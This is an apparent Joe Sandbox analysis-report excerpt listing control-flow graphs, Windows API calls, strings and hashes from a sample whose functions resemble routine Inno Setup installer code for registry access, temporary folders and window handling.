                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                            • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                            • API String ID: 2230631259-2623177817
                                                                                            • Opcode ID: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
                                                                                            • Instruction ID: 139b281cd70ff203116dc437a84a2e67e00dfa051846aebc7d59a7e7d95df608
                                                                                            • Opcode Fuzzy Hash: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
                                                                                            • Instruction Fuzzy Hash: B1110D41504341D4DB2077BA6C45B7F2A8C8B11319F080C3B6C50662F3CA7C8887DBAF

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1594 472708-47273b 1595 472e26-472e5a call 46d4ec call 403400 * 2 call 403420 1594->1595 1596 472741-472745 1594->1596 1597 47274c-472789 call 40b44c call 4780d8 1596->1597 1608 47278f-4727ce call 47c6f0 call 477d4c call 47ad88 * 2 1597->1608 1609 472e1a-472e20 1597->1609 1620 4727d4-4727db 1608->1620 1621 4727d0 1608->1621 1609->1595 1609->1597 1622 4727f4-47280d 1620->1622 1623 4727dd-4727e4 1620->1623 1621->1620 1626 472833-47283a 1622->1626 1627 47280f-472819 call 472538 1622->1627 1624 4727e6-4727eb call 4529a4 1623->1624 1625 4727f0 1623->1625 1624->1625 1625->1622 1628 47283c-472843 1626->1628 1629 472849-472850 1626->1629 1627->1626 1636 47281b-47282e call 403738 call 42dde8 1627->1636 1628->1629 1632 472cf7-472d2d 1628->1632 1633 4728a3-4728c3 call 47255c 1629->1633 1634 472852-472859 1629->1634 1632->1622 1642 472d33-472d3a 1632->1642 1645 472936-47293d 1633->1645 1646 4728c5-4728ea call 403738 call 42dd0c 1633->1646 1634->1633 1639 47285b-47287d call 403738 call 42dd44 1634->1639 1636->1626 1639->1632 1674 472883-47289e call 403738 RegDeleteValueA RegCloseKey 1639->1674 1647 472d6d-472d74 1642->1647 1648 472d3c-472d46 call 472538 1642->1648 1650 472986 1645->1650 1651 47293f-472963 call 403738 call 42dd44 1645->1651 1677 4728ef-4728f3 1646->1677 1656 472da7-472dae 1647->1656 1657 472d76-472d80 call 472538 1647->1657 1648->1647 1672 472d48-472d68 call 459ad4 1648->1672 1663 47298b-47298d 1650->1663 1651->1663 1695 472965-472968 1651->1695 1659 472db0-472dd6 call 459ad4 1656->1659 1660 472ddb-472de2 1656->1660 1657->1656 1675 472d82-472da2 call 459ad4 1657->1675 1659->1660 1670 472de4-472e0a call 459ad4 1660->1670 1671 472e0f-472e15 call 477d78 1660->1671 1663->1632 1673 472993-4729a8 1663->1673 1670->1671 1671->1609 1672->1647 1681 4729bc-4729c3 1673->1681 1682 4729aa-4729b7 call 403738 RegDeleteValueA 1673->1682 1674->1632 1675->1656 1688 4728f5-4728f9 1677->1688 1689 47291a-472921 1677->1689 1685 472cd9-472cef RegCloseKey 1681->1685 1686 4729c9-4729d0 1681->1686 1682->1681 1693 4729d2-4729e6 call 403738 call 42dc8c 1686->1693 1694 4729ec-4729f9 1686->1694 1688->1663 1696 4728ff-472918 call 47255c 1688->1696 1689->1663 1697 472923-472934 call 46dd50 1689->1697 1693->1685 1693->1694 1694->1685 1700 4729ff 1694->1700 1695->1663 1699 47296a-472971 1695->1699 1696->1663 1697->1663 1699->1663 1704 472973-472984 call 46dd50 1699->1704 1700->1685 1705 472c26-472c41 call 47ad88 call 430acc 1700->1705 1706 472bc4-472bfd call 47ad88 call 406da0 call 403738 RegSetValueExA 1700->1706 1707 472a22-472a2c 1700->1707 1708 472c8b-472cbd call 403574 call 403738 * 2 RegSetValueExA 1700->1708 1704->1663 1736 472c43-472c48 call 4529a4 1705->1736 1737 472c4d-472c6d call 403738 RegSetValueExA 1705->1737 1706->1685 1754 472c03-472c0a 1706->1754 1714 472a35-472a3a 1707->1714 1715 472a2e-472a31 1707->1715 1708->1685 1750 472cbf-472cc6 1708->1750 1724 472a41-472a43 1714->1724 1721 472a33 1715->1721 1722 472a3c 1715->1722 1721->1724 1722->1724 1726 472ae0-472af2 call 40385c 1724->1726 1727 472a49-472a5b call 40385c 1724->1727 1747 472af4-472b0b call 403738 call 42dc80 1726->1747 1748 472b0d-472b10 call 403400 1726->1748 1744 472a76-472a79 call 403400 1727->1744 1745 472a5d-472a74 call 403738 call 42dc74 1727->1745 1736->1737 1737->1685 1759 472c6f-472c76 1737->1759 1762 472a7e-472a85 1744->1762 1745->1744 1745->1762 1747->1748 1763 472b15-472b4e call 47ada8 1747->1763 1748->1763 1750->1685 1757 472cc8-472cd4 call 46dd50 1750->1757 1754->1685 1761 472c10-472c21 call 46dd50 1754->1761 1757->1685 1759->1685 1766 472c78-472c89 call 46dd50 1759->1766 1761->1685 1769 472a87-472aa5 call 403738 RegQueryValueExA 1762->1769 1770 472ab6-472adb call 47ada8 1762->1770 1779 472b50-472b60 call 403574 1763->1779 1780 472b6f-472b9b call 403574 call 403738 * 2 RegSetValueExA 1763->1780 1766->1685 1769->1770 1786 472aa7-472aab 1769->1786 1770->1780 1779->1780 1791 472b62-472b6a call 40357c 1779->1791 1780->1685 1797 472ba1-472ba8 1780->1797 1789 472ab3 1786->1789 1790 472aad-472ab1 1786->1790 1789->1770 1790->1770 1790->1789 1791->1780 1797->1685 1798 472bae-472bbf call 46dd50 1797->1798 1798->1685
                                                                                            APIs
                                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?,0049B178), ref: 00472890
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 00472899
                                                                                              • Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
                                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000000,00472CF0,?,?,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 004729B7
                                                                                              • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                              • Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: DeleteErrorLastValue$CloseCreate
                                                                                            • String ID: Cannot access 64-bit registry keys on this version of Windows$Failed to parse "qword" value$break$olddata${olddata}
                                                                                            • API String ID: 2638610037-3092547568
                                                                                            • Opcode ID: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
                                                                                            • Instruction ID: 0e42c6b5a9d89693cebc7f702fd10ac1157821fa568552e70b891395feb5272a
                                                                                            • Opcode Fuzzy Hash: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
                                                                                            • Instruction Fuzzy Hash: BE320D74E00248AFDB15DFA9D581BDEB7F4AF08304F448066F914AB3A2CB78AD45CB59

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1801 4684c8-468500 call 47ad88 1804 468506-468516 call 4778cc 1801->1804 1805 4686e2-4686fc call 403420 1801->1805 1810 46851b-468560 call 4078fc call 403738 call 42dd44 1804->1810 1816 468565-468567 1810->1816 1817 46856d-468582 1816->1817 1818 4686d8-4686dc 1816->1818 1819 468597-46859e 1817->1819 1820 468584-468592 call 42dc74 1817->1820 1818->1805 1818->1810 1822 4685a0-4685c2 call 42dc74 call 42dc8c 1819->1822 1823 4685cb-4685d2 1819->1823 1820->1819 1822->1823 1844 4685c4 1822->1844 1824 4685d4-4685f9 call 42dc74 * 2 1823->1824 1825 46862b-468632 1823->1825 1847 4685fb-468604 call 478558 1824->1847 1848 468609-46861b call 42dc74 1824->1848 1829 468634-468646 call 42dc74 1825->1829 1830 468678-46867f 1825->1830 1840 468656-468668 call 42dc74 1829->1840 1841 468648-468651 call 478558 1829->1841 1832 468681-4686b5 call 42dc74 * 3 1830->1832 1833 4686ba-4686d0 RegCloseKey 1830->1833 1832->1833 1840->1830 1854 46866a-468673 call 478558 1840->1854 1841->1840 1844->1823 1847->1848 1848->1825 1858 46861d-468626 call 478558 1848->1858 1854->1830 1858->1825
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegCloseKey.ADVAPI32(?,004686E2,?,?,00000001,00000000,00000000,004686FD,?,00000000,00000000,?), ref: 004686CB
                                                                                            Strings
                                                                                            • Inno Setup: User Info: Name, xrefs: 00468687
                                                                                            • Inno Setup: Deselected Tasks, xrefs: 00468659
                                                                                            • Inno Setup: User Info: Organization, xrefs: 0046869A
                                                                                            • Inno Setup: Selected Components, xrefs: 004685EA
                                                                                            • Inno Setup: Selected Tasks, xrefs: 00468637
                                                                                            • Inno Setup: No Icons, xrefs: 004685B3
                                                                                            • Inno Setup: Setup Type, xrefs: 004685DA
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468527
                                                                                            • Inno Setup: Icon Group, xrefs: 004685A6
                                                                                            • %s\%s_is1, xrefs: 00468545
                                                                                            • Inno Setup: App Path, xrefs: 0046858A
                                                                                            • Inno Setup: User Info: Serial, xrefs: 004686AD
                                                                                            • Inno Setup: Deselected Components, xrefs: 0046860C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                            • API String ID: 47109696-1093091907
                                                                                            • Opcode ID: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
                                                                                            • Instruction ID: 9e5fcdcadd17e924e807c4804dd8b09e3b38f40da8ec3e6eb3bcc5aac06a0e07
                                                                                            • Opcode Fuzzy Hash: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
                                                                                            • Instruction Fuzzy Hash: 7751B570A002089BDB11DB65D9416DEB7F5EF49304FA086BEE840A7391EF78AE05CB5D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2019 47b8dc-47b932 call 42c40c call 4035c0 call 47b558 call 451c38 2028 47b934-47b939 call 4529a4 2019->2028 2029 47b93e-47b94d call 451c38 2019->2029 2028->2029 2033 47b967-47b96d 2029->2033 2034 47b94f-47b955 2029->2034 2037 47b984-47b9ac call 42e2bc * 2 2033->2037 2038 47b96f-47b975 2033->2038 2035 47b977-47b97f call 403494 2034->2035 2036 47b957-47b95d 2034->2036 2035->2037 2036->2033 2039 47b95f-47b965 2036->2039 2045 47b9d3-47b9ed GetProcAddress 2037->2045 2046 47b9ae-47b9ce call 4078fc call 4529a4 2037->2046 2038->2035 2038->2037 2039->2033 2039->2035 2047 47b9ef-47b9f4 call 4529a4 2045->2047 2048 47b9f9-47ba16 call 403400 * 2 2045->2048 2046->2045 2047->2048
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(74600000,SHGetFolderPathA), ref: 0047B9DE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$j]I$shell32.dll$shfolder.dll
                                                                                            • API String ID: 190572456-2632518235
                                                                                            • Opcode ID: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
                                                                                            • Instruction ID: 54e288ff13d65e77707e80ace3ca021a5634fe8f765e4003a0d502320fe0c017
                                                                                            • Opcode Fuzzy Hash: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
                                                                                            • Instruction Fuzzy Hash: 62311DB0A00249DFCB10EB95D982AEEB7B4EF44308F50847BE554E7352D7389E458BAD

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B643
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B64C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup$oI$oI
                                                                                            • API String ID: 1375471231-857235331
                                                                                            • Opcode ID: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
                                                                                            • Instruction ID: c69cc1ab8f896661f98e1b5ecb406916ff938ef434e98a02422d0df200dcf9d8
                                                                                            • Opcode Fuzzy Hash: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
                                                                                            • Instruction Fuzzy Hash: 45415C34A002099FCB04EFA5D992ADEB7B5EF48309F50843BE51477392DB389E058B99

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2220 406334-40634e GetModuleHandleA GetProcAddress 2221 406350 2220->2221 2222 406357-406364 GetProcAddress 2220->2222 2221->2222 2223 406366 2222->2223 2224 40636d-40637a GetProcAddress 2222->2224 2223->2224 2225 406380-406381 2224->2225 2226 40637c-40637e SetProcessDEPPolicy 2224->2226 2226->2225
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                            • API String ID: 3256987805-3653653586
                                                                                            • Opcode ID: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
                                                                                            • Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
                                                                                            • Opcode Fuzzy Hash: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
                                                                                            • Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2227 423884-42388e 2228 4239b7-4239bb 2227->2228 2229 423894-4238b6 call 41f3d4 GetClassInfoA 2227->2229 2232 4238e7-4238f0 GetSystemMetrics 2229->2232 2233 4238b8-4238cf RegisterClassA 2229->2233 2235 4238f2 2232->2235 2236 4238f5-4238ff GetSystemMetrics 2232->2236 2233->2232 2234 4238d1-4238e2 call 408cc4 call 40311c 2233->2234 2234->2232 2235->2236 2238 423901 2236->2238 2239 423904-423960 call 403738 call 406300 call 403400 call 42365c SetWindowLongA 2236->2239 2238->2239 2250 423962-423975 call 424188 SendMessageA 2239->2250 2251 42397a-4239a8 GetSystemMenu DeleteMenu * 2 2239->2251 2250->2251 2251->2228 2253 4239aa-4239b2 DeleteMenu 2251->2253 2253->2228
                                                                                            APIs
                                                                                              • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                            • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                                                            • RegisterClassA.USER32(00498630), ref: 004238C7
                                                                                            • GetSystemMetrics.USER32(00000000), ref: 004238E9
                                                                                            • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                                                            • SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
                                                                                            • SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
                                                                                            • GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                            • String ID:
                                                                                            • API String ID: 183575631-0
                                                                                            • Opcode ID: 2e18e7cb37a10cc72f1a00071a2b011d07737f2aabe43150d948db026574d78a
                                                                                            • Instruction ID: a1bb8b483c6051ae977dcd30bc5d6258be0549d98267ef4ab912faaf57b8e79c
                                                                                            • Opcode Fuzzy Hash: 2e18e7cb37a10cc72f1a00071a2b011d07737f2aabe43150d948db026574d78a
                                                                                            • Instruction Fuzzy Hash: 463184B17402006AEB10BF65DC82F6636A89B15308F10017BFA40EF2D7CABDDD40876D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2255 42f3d4-42f3de 2256 42f3e0-42f3e3 call 402d30 2255->2256 2257 42f3e8-42f425 call 402b30 GetActiveWindow GetFocus call 41eeb4 2255->2257 2256->2257 2263 42f437-42f43f 2257->2263 2264 42f427-42f431 RegisterClassA 2257->2264 2265 42f4c6-42f4e2 SetFocus call 403400 2263->2265 2266 42f445-42f476 CreateWindowExA 2263->2266 2264->2263 2266->2265 2267 42f478-42f4bc call 42428c call 403738 CreateWindowExA 2266->2267 2267->2265 2274 42f4be-42f4c1 ShowWindow 2267->2274 2274->2265
                                                                                            APIs
                                                                                            • GetActiveWindow.USER32 ref: 0042F403
                                                                                            • GetFocus.USER32 ref: 0042F40B
                                                                                            • RegisterClassA.USER32(004987AC), ref: 0042F42C
                                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F500,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F46A
                                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F4B0
                                                                                            • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F4C1
                                                                                            • SetFocus.USER32(00000000,00000000,0042F4E3,?,?,?,00000001,00000000,?,00457A52,00000000,0049A628), ref: 0042F4C8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                            • String ID: TWindowDisabler-Window
                                                                                            • API String ID: 3167913817-1824977358
                                                                                            • Opcode ID: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
                                                                                            • Instruction ID: a85808fe2fc477e6bfefb4b7344e4229cc17534778a3dce562db4a9d559d1a3d
                                                                                            • Opcode Fuzzy Hash: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
                                                                                            • Instruction Fuzzy Hash: 6921A371740710BAE220EF619D03F1B76A4EB14B44FA0813BF904AB2D1D7BC6D5486EE

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2275 452850-4528a1 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 2276 4528a3-4528aa 2275->2276 2277 4528ac-4528ae 2275->2277 2276->2277 2278 4528b0 2276->2278 2279 4528b2-4528e8 call 42e2bc call 42e73c call 403400 2277->2279 2278->2279
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                            • API String ID: 1646373207-2130885113
                                                                                            • Opcode ID: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
                                                                                            • Instruction ID: 1764834aba405073ceae9d3f2b1e241b80e40901185f6bd62a0f27775e5f306d
                                                                                            • Opcode Fuzzy Hash: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
                                                                                            • Instruction Fuzzy Hash: DB0188B0300300EED701BBA29D03B9B3A58EB56725F50443BF80066287D7FC4909DABD
                                                                                            APIs
                                                                                            • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
                                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
